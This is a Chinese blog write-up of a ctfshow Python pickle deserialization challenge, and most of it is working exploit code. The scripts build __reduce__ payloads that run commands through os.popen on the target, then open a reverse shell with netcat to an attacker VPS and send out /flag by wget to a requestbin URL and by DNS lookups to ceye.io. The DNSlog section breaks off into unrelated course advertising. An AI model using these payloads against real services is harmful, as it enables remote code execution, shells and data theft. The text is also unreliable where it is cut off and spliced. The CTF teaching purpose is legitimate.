ctfshow python反序列化 刷题记录

于 2024-04-20 02:39:55 发布
阅读量789 收藏 24
点赞数 15
分类专栏: 程序员 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84009529/article/details/137983947
版权

先看给的提示:传入的 data 先进行 base64 解码后在进行反序列化,所以我们序列化完成之后还要额外进行 base64 编码

先简单的写一个爬虫脚本:

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'ls /'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

params 的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。在这种情况下,params 是一个字典,包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数,以便服务器可以根据这些参数来处理请求。

image-20240325161132826

无论是ls /还是cat /flag,回显都是 backdoor here:说明是一道 ”无回显“ 的题目。

有两种方法:反弹 shell 和 的 dns 外带

反弹 shell

只需将脚本稍微改一下:

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'nc vps-ip port -e /bin/sh'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

然后先再 vps 上开启对应端口的监听在运行脚本(否则会报错)

以1234端口为例:

nc -lvnp 1234

image-20240325162846097

运行脚本后则会显示:

image-20240325162614566

此时就可以输入 Linux 命令来读取 flag 啦

image-20240325162748641

dns 外带

RequestBin

网址:RequestBin — Collect, inspect and debug HTTP requests and webhooks

先点击 Create a RequestBin 获取一个 url

同样只需将脚本稍微改一下:

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'wget http://requestbin.cn:80/1cpartx1?a=`cat /flag`'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

wget是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。

运行脚本就能得到 flag

image-20240325170204095

CEYE

网址:CEYE - Monitor service for security testing

可以稍微参考一下这篇文章:RCE绕过之无回显-CSDN博客,也可以在 http://ceye.io/payloads 中找相对应的 payload

在 http://ceye.io/profile 下的 Identifier 可以获取对应 url

同样只需将脚本稍微改一下:

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'wget `cat /flag`.zrne70.ceye.io'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

在 http://ceye.io/records/dns 即可找到 flag

yqftM9pg8duAUEF

DNSlog

网址:DNSLog Platform

先点击 Get SubDomain 获取一个 url

同样只需将脚本稍微改一下:

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Python工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Python开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

img

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注:Python)

f49b566129f47b8a67243c1008edf79.png)

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注:Python)

2401_84009529
关注
  • 15
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅析Python 序列化与反序列化
09-16
主要介绍了Python 序列化与反序列化的相关资料,文中讲解非常细致,代码帮助大家更好的理解和学习,感兴趣的朋友可以了解下
python3序列化与反序列化用法实例
09-22
主要介绍了python3序列化与反序列化用法,实例分析了Python3使用pickle模块针对字符串进行序列化操作的相关技巧,需要的朋友可以参考下
CTFshow 反序列化
starttv的博客
12-09 764
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
ctfshow 反序列化篇(下)
m0_62422842的博客
08-05 861
ctfshow反序列化web267-web268的题目
ctfshow—反序列化
cosmoslin的博客
11-15 2099
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
CTFSHOW 反序列化
热门推荐
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
Python中shelve序列化与反序列化
12-22
序列化/反序列化 将对象转换为可通过网络传输或可以存储到本地磁盘的数据格式(如:XML、JSON或特定格式的字节串)的过程称为序列化;反之,则称为反序列化 shelve shelve是一个简单的数据存储方案,类似key-value...
python序列化反序列化和异常处理笔记.doc
10-01
Python的序列化与反序列化是将数据结构或对象转换为可存储或传输的格式,然后再次转换回原数据的过程。这一过程对于保存程序状态、跨进程通信、数据持久化等场景非常有用。Python提供了多种序列化库,如pickle、json...
老生常谈Python序列化和反序列化
09-21
下面小编就为大家带来一篇老生常谈Python序列化和反序列化。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Python序列化与反序列化pickle用法实例
09-18
Python的序列化与反序列化是编程中常用的技术,它允许我们将程序中的对象转换为可存储或传输的数据格式,然后再将这些数据恢复为原始对象。序列化常用于持久化数据,比如保存用户会话、缓存计算结果或者跨进程传递...
Python实现的序列化和反序列化二叉树算法示例
09-19
Python中,序列化是将对象转换为可存储或可传输的格式,而反序列化则是将这种格式还原为原来的对象。在本示例中,我们将探讨如何使用Python实现二叉树的序列化和反序列化。 首先,我们来理解二叉树。二叉树是一种...
详解Python 序列化Serialize 和 反序列化Deserialize
01-21
详解Python 序列化Serialize 和 反序列化Deserialize 序列化 (serialization) 序列化是将对象状态转换为可保持或传输的格式的过程。与序列化相对的是反序列化, 它将流转换为对象。这两个过程结合起来,可以轻松地...
Python Json序列化与反序列化的示例
09-20
主要介绍了Python Json序列化与反序列化的示例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Python使用pickle进行序列化和反序列化的示例代码
09-24
Python的pickle库是一个强大的工具,用于对象的序列化和反序列化。序列化是将Python对象转换为字节流的过程,而反序列化则是将字节流恢复为原来的Python对象。这个过程允许我们将复杂的对象结构保存到文件或通过网络...
CTFSHOW 反序列化
ing_end的博客
04-09 1296
反序列化 为什么要序列化 class 类 实验室成员 obj 对象(是一种语言结构,一个对象就是一个变量)某一个成员 特征(成员变量) 性别,姓名。。。。。。 方法(动作) 思考,听课,下课。。。。。。 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定
详解Python中的序列化与反序列化的使用
01-20
学习过marshal模块用于序列化和反序列化,但marshal的功能比较薄弱,只支持部分内置数据类型的序列化/反序列化,对于用户自定义的类型就无能为力,同时marshal不支持自引用(递归引用)的对象的序列化。所以直接使用...
Python实现JSON反序列化类对象的示例
12-23
之前在Java里面,实现序列化和反序列化,不管是 jackson ,还是 fastjson 都非常的简单。现在有项目需要用Python开发,很自然的希望这样的便利也能在Python中体现。 但是在网上看了一些教程,讲反序列化的时候,...
Python 序列化和反序列化库 MarshMallow 的用法实例代码
09-17
Python中的序列化和反序列化是将复杂的数据结构转换为基本的数据类型,以便于存储、传输或解析。Marshmallow是一个轻量级的库,专门设计用于处理这些任务,并且提供了数据验证的功能。它允许开发者定义复杂的序列化...
python反序列化
最新发布
07-31
Python中的反序列化是指将序列化后的数据重新转化为原始的Python对象。在Python中,可以使用json模块的loads方法来进行反序列化操作。该方法可以将一个JSON字符串转化为对应的Python对象。 例如,如果有一个JSON字符串`a`,可以使用`json.loads(a)`来将其转化为Python对象。转化后的对象的类型取决于原始JSON字符串的内容。如果原始JSON字符串表示一个字典,那么转化后的对象将是一个字典;如果原始JSON字符串表示一个列表,那么转化后的对象将是一个列表。 引用[2]中的代码示例展示了如何使用json模块的loads方法进行反序列化操作。在该示例中,首先使用dumps方法将一个列表对象转化为JSON字符串,然后使用loads方法将该JSON字符串转化回列表对象。 总结起来,Python中的反序列化是通过json模块的loads方法将JSON字符串转化为对应的Python对象。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值